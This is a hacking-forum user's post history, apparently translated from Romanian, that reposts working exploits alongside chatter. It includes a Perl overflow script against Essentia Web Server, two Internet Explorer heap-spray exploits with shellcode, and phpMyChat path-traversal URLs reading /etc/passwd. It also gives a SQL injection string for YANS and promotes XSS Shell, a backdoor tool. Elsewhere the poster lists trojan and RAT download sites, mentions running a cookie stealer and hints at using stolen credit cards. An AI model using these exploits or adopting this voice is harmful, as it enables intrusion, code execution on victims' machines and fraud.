
escalation666

Everything posted by escalation666

  1. Essentia Web Server V 2.15
     Author: CorryL x0n3-h4ck.org

     -=[-----------------------------------------------]=-
     -=[+] Application: Essentia Web Server
     -=[+] Version: 2.15
     -=[+] Vendor's URL: http://www.essencomp.com
     -=[+] Platform: Windows
     -=[+] Bug type: Buffer overflow
     -=[+] Exploitation: Remote
     -=[-]
     -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
     -=[+] Reference: http://www.x0n3-h4ck.org
     -=[+] Virtual Office: http://www.kasamba.com/CorryL

     ..::[ Description ]::..
     Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers.

     ..::[ Bug ]::..
     This software is affected by a buffer overflow that would allow an attacker to execute arbitrary code on the victim system. Sending a GET+Ax6800 request, he would succeed in writing above the seh point.

     ..::[ Proof Of Concept ]::..
     #!/usr/bin/perl
     use IO::Socket;
     use Getopt::Std;
     getopts('h:', \%args);
     if (defined($args{'h'})) { $host = $args{'h'}; }
     print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";
     print STDERR "-=[ Discovered By CorryL corryl80\@gmail.com ]=-\n";
     print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-\n\n";
     if (!defined($host)) { Usage(); }
     $dos = "A"x6800;
     print "[+] Connect to $host\n";
     $socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80, Proto => 'tcp');
     die unless $socket;
     print "[+] Sending DOS byte\n";
     $data = "GET /$dos \r\n\r\n";

     ..::[ Workaround ]::..
     nothing

     ..::[ Disclosure Timeline ]::..
     [30/10/2006] - Vendor notification
     [04/11/2006] - No Vendor Response
     [04/11/2006] - Public disclosure
  2. #se pare ca ti-au raspuns astia la intrebari <html xmlns="http://www.w3.org/1999/xhtml"> <body> <script> var heapSprayToAddress = 0x05050505; var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); </script> <script> var heapBlockSize = 0x400000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x3b); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory = spraySlide + payLoadCode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } </script> <object id=target classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5" > </object> <script> var obj = null; obj = document.getElementById('target').object; try { obj.open(new Array(),new Array(),new Array(),new Array(),new Array()); } catch(e) {}; obj.open(new Object(),new Object(),new Object(),new Object(), new Object()); obj.setRequestHeader(new Object(),'......'); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); 
obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); </script> </body></html> # milw0rm.com [2006-11-10]
  3. well, it would be normal to tell people something about the programs before they download them... such as the fact that they're rather old. I wouldn't grab a program with my eyes closed
  4. a very good tutorial... keep up the good work!
  5. http://ferruh.mavituna.com/xssshell/download/xssshellv039.zip
     -------------------------
     WHAT IS XSS SHELL ?
     -------------------------
     XSS Shell is a powerful XSS backdoor and zombie manager. This concept was first presented by "XSS-Proxy - http://xss-proxy.sourceforge.net/". Normally in XSS attacks the attacker has one shot; in XSS Shell you can interactively send requests and get responses from the victim. You can backdoor the page. You can steal basic auth, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability etc. Attack possibilities are limited with ideas. Basically this tool demonstrates that you can do more with XSS.
  6. yeah, they're rather old... at least those trojans are already expired... ping of death... that was used 10 years ago, and the latest version of cain is 2.8.6, etc.
  7. you picked the wrong place to post, buddy
  8. zbeng, make me a video tutorial about cracking girls. I'm just kidding too..
  9. http://brainbulb.com/php-security-audit-howto.mov an educational tutorial about PHP security
  10. http://www.milw0rm.com - exploits, tutorials, forum, videos
      http://vxchaos.cjb.net - lots of useful hacking programs
      www.xfocus.org - exploits, programs, tutorials, forum
      www.cirt.net/cgi-bin/passwd.pl - default passwords for programs and routers
      www.phenoelit.de/dpl/dpl.html - default router passwords
      www.windowsecurity.com - Windows "security"
      http://ha.ckers.org - interesting topics about XSS
      www.metasploit.com - exploits; now it also has an automated exploits module!
      www.zone-h.org - interesting site with data on daily defacements
      http://koala.ilog.fr/vb/vb-hotlist.html - impressive collection of links about almost anything web-related!
      http://neworder.box.sk - site with many hacking resources
      www.secureroot.com - hacking resources
      www.antiproxy.com - proxy lists
      www.iss.net/security_center/advice - site of the company that makes BlackIce; has some documentation
      www.securityfocus.com - among the best exploit sites!
      www.securiteam.com - exploits described somewhat better than on securityfocus
      www.programmersheaven.com - site with many programming resources
      www.w3schools.com - site with excellent web programming tutorials
      http://labmice.techtarget.com - interesting tutorials that teach you to do just about anything in Windows
      www.trojanfrance.com - trojans...
      www.sinred.com - more trojans
      www.darknet.org.uk - hacking resources
      http://lan.deluxnetwork.com/linux/exploits - exploits for Linux
      www.ip-index.de - list of IPs by country
      www.governmentsecurity.org - hacking forum... to register you have to write an article and submit it on http://www.datastronghold.com
      www.datastronghold.com - hacking resources
      www.indian-hackers.net - hacking resources
      www.buha.info - a fairly interesting German site
      http://proxy-list.org/en - proxy list
      http://johnny.ihackstuff.com - google hacking!
      www.security-project.org - some exploits
      www.irongeek.com - hacking videos
      www.databasesecurity.com - database security
      www.bright-shadows.net - wargames
      www.infoshackers.com - wargames
      www.ngsec.com - wargames
      www.fatetek.net - the fate game
      www.blind-dice.com - wargames
      http://mod-x.co.uk - wargames
      www.chumley.biz - wargames
      www.tizag.com - web tutorials
      www.hellboundhackers.org - wargames
      http://hackthissite.org - wargames
      www.pulltheplug.org - wargames
      www.hackquest.com - wargames
      http://news.netcraft.com - extremely useful information about servers
      www.cgisecurity.com/ - security of the web and of web applications in general
      www.hackerscenter.com - hacking resources
      http://packetstormsecurity.org
      http://boxp.sourceforge.net - the BOXP remote administration program for Windows
      http://chasenet.org/home - RATs, rootkits, trojans and other goodies
      http://censorednet.taunet.org - RATs, rootkits, trojans and other goodies
      www.megasecurity.org - RATs, rootkits, trojans and other goodies
      www.nuclearwinter.mirrorz.com - RATs, rootkits, trojans and other goodies
      www.theargon.com/achilles/wordlists/theargonlists - wordlists
      http://sectools.org/ - top 100 security tools
      www.samspade.org - services such as whois, traceroute, dns, routing explore and many others
      http://www.freerainbowtables.com - free rainbow tables
      http://gdataonline.com - online md5 cracker
      http://passcracking.ru - online md5 cracker
      http://www.plain-text.info - lm/md5 password cracker
      there would be more... but I have to find the rest of the files with links around my computer
  11. welcome, roacker. maybe you'll learn to break something too while you're here... at least glasses
  12. I'm in your situation too, but the obsession with hacking makes me keep going (to stay alive)... but the truth is that repetitive work wears you out mentally a lot.... a short vacation or a new hobby.. I don't think it would hurt. I, for example, should really get started on university
  13. yeah... last night I put up a cookie stealer... and maybe that's why. anyway.. it was stated on the front page that the information on the site is purely educational
  14. I think the freepage guys shut down my site... I think... ******** them, the ******, there was educational stuff there and nothing illegal, damn it.... who can help me get a domain... I have CCs... but they're older and I don't know if they still work.. Thanks to the elf http://share.urbanfriends.us/uploads/27b4001d92.rar
  15. it works... thx m8. it's good for lamers like me who don't feel like searching for proxy lists..
  16. *******************************************************************************
      # Title : PhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability
      # Author : ajann
      # Dork : phpMyChat 0.14.5 , phpMyChat
      # Vuln;
      *******************************************************************************
      [File]
      localization/languages.lib.php3
      [/File]

      [Code,1]
      languages.lib.php3
      Error:
      ..
      ....
      require("./${ChatPath}config/config.lib.php3");
      require("./${ChatPath}lib/database/".C_DB_TYPE.".lib.php3");
      require("./${ChatPath}lib/clean.lib.php3");
      ....
      ..
      Key [:] ChatPath=[file]

      Example:
      http://target.com/path/localization/languages.lib.php3?ChatPath=../../etc/passwd

      # ajann,Turkey
      # ...
      # Im not Hacker!
  17. *******************************************************************************
      # Title : PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities
      # Author : ajann
      # Dork : phpMyChat plus
      # Vuln;
      *******************************************************************************
      [Files]
      avatar.php
      colorhelp_popup.php
      color_popup.php
      index.php
      index1.php
      /lib/connected_users.lib.php
      /lib/index.lib.php
      logs.php
      phpMyChat.php3
      [/Files]

      [Code,1]
      connected_users.lib.php
      Error:
      ..
      ....
      require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php");
      require("./${ChatPath}/lib/clean.lib.php");
      ....
      ..
      Key [:] ChatPath=[file]
      Key [:] ChatPath=[file]
      Key [:] ChatPath=[file]
      Key [:] ChatPath=[file]
      Key [:] ChatPath=[file]
      Key [:] ChatPath=[file]
      Key [:] ChatPath=[file]
      Key [:] L=[file]
      Key [:] ChatPath=[file]

      Example:
      http://target.com/path/avatar.php?ChatPath=../../etc/passwd
      http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd
      http://target.com/path/color_popup.php?ChatPath=../../etc/passwd
      http://target.com/path/index.php?ChatPath=../../etc/passwd
      http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd
      http://target.com/path/avatar.php?ChatPath=../../etc/passwd
      http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd
      http://target.com/path/logs.php?L=../../etc/passwd
      http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd

      # ajann,Turkey
      # ...
      # Im not Hacker!
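For the `require("./${ChatPath}...")` pattern quoted in the two phpMyChat advisories above, a hardened form of the include logic is sketched here. This is an added example, not code from phpMyChat or from the advisory author; `CHAT_ROOT`, `ALLOWED_LIBS` and `chat_lib_path()` are hypothetical names, and it assumes the library files live under the script's own directory.

```php
<?php
// Added example (not phpMyChat code); all names here are hypothetical.

// Before (pattern quoted in the advisory): the include prefix is a variable
// that the request can set.
//   require("./${ChatPath}lib/clean.lib.php3");

// After: the base directory is fixed in code, never read from the request,
// and only library names on an allowlist are ever included.
define('CHAT_ROOT', __DIR__);

const ALLOWED_LIBS = ['config/config.lib.php3', 'lib/clean.lib.php3'];

function chat_lib_path(string $relative): string
{
    if (!in_array($relative, ALLOWED_LIBS, true)) {
        throw new InvalidArgumentException('library not on allowlist');
    }
    $root = realpath(CHAT_ROOT);
    $full = realpath($root . DIRECTORY_SEPARATOR . $relative);
    // realpath() resolves ../ and symlinks; refuse anything that is missing
    // or that resolves outside the chat root.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('library missing or outside chat root');
    }
    return $full;
}

// Constructed inputs: one legitimate library name and the traversal string
// used in the advisory's example URLs.
foreach (['lib/clean.lib.php3', '../../etc/passwd'] as $candidate) {
    try {
        require_once chat_lib_path($candidate);
        echo "loaded {$candidate}\n";
    } catch (Exception $e) {
        echo "refused {$candidate}: {$e->getMessage()}\n";
    }
}
```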
  18. Product: YANS (yet another news system)
      Link: http://sourceforge.net/projects/yans/
      vuln code:
      $resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error());
      simple sql injection
      ' or '1=1
      ' or '1=1
      -navairum
  19. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN"> <!-- MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit Author: n/a Info: http://blogs.securiteam.com/index.php/archives/721 http://isc.sans.org/diary.php?storyid=1823 http://xforce.iss.net/xforce/alerts/id/239 Found in the wild and was pointed out on securiteam's blog (cheers Gadi Evron!) Changed up the shellcode so it wouldn't be as evil for the viewers, calc.exe is called. /str0ke --> <html xmlns="http://www.w3.org/1999/xhtml"> <body> <object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" > </object> <script> var obj = null; function exploit() { obj = document.getElementById('target').object; try { obj.open(new Array(),new Array(),new Array(),new Array(),new Array()); } catch(e) {}; sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" + "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" + "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" + "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" + "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" + "%uFF57%u63E7%u6C61%u0063"); sz = sh.length * 2; npsz = 0x400000-(sz+0x3b); nps = unescape ("%u0D0D%u0D0D"); while (nps.length*2<npsz) nps+=nps; ihbc = (0x12000000-0x400000)/0x400000; mm = new Array(); for (i=0;i<ihbc;i++) mm = nps+sh; obj.open(new Object(),new Object(),new Object(),new Object(), new Object()); obj.setRequestHeader(new Object(),'......'); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); 
obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); } </script> <body onLoad='exploit()' value='Exploit'> </body></html> # milw0rm.com [2006-11-08]
  20. Kw3[R]Ln, did you add bullets and little stars for us? it's a pretty good idea... I've seen something similar on a hacking forum... and the ranks were soldiers... sergeants.. captains etc
  21. welcome m8....and hack the f***** planet!
  22. Happy birthday! are you buying drinks?
  23. that little animal... no animals if possible, and with the nick a bit more horizontal.. okay... I think I'm going to sleep too.. I don't even remember when I last slept
  24. first of all, an avatar, to be sexy, has to have the measurements: 90-60-90. I don't know how much that is in pixels... but it should be about like yours +50% in size, not too big... but not too discreet either
  25. I think you're a new ENCODED around here. colors: green with black; or black with red; it should have my nick... and something with Romanian Security Team... or RST. skeletons, blood, skulls, 666, you get the idea.. you can try to make something.. that I can put as avatar.. in the signature and possibly on defacements